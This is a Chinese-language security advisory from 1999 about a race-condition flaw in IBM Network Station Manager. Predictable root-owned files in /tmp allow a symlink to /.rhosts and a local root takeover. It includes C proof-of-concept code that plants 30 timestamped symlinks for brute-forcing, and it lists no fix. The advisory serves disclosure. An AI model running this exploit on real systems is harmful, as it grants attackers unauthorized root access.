IBM Network Station Manager存在安全漏洞发布时间:1999-12-27 更新时间:1999-12-27 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Misc详细描述 IBM Network Station Manager是一个管理IBM网络站的客户/服务端的应用程序,在主机中运行此守护程序会导致安全漏洞,NETSTATION是以ROOT身份运行的并在/tmp建立可以预测的一些熟知的文件,这样可以使用猜测一个文件名并软连接到/.rhosts,攻击者在把+ +增加到文件中就可以获得ROOT权限。 测试代码 下面的程序能够创建30个连接来进行暴力攻击: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> void main() { /* Change these paths */ char dest[20] = "/.rhosts"; char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu"; char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu"; long sec; int i; sec = time(0); for (i = 0; i < 30; i++) { sprintf(sourcesym, "%s%d", source, (sec + i)); symlink(dest,sourcesym); } } 解决方案 暂无 相关信息 |
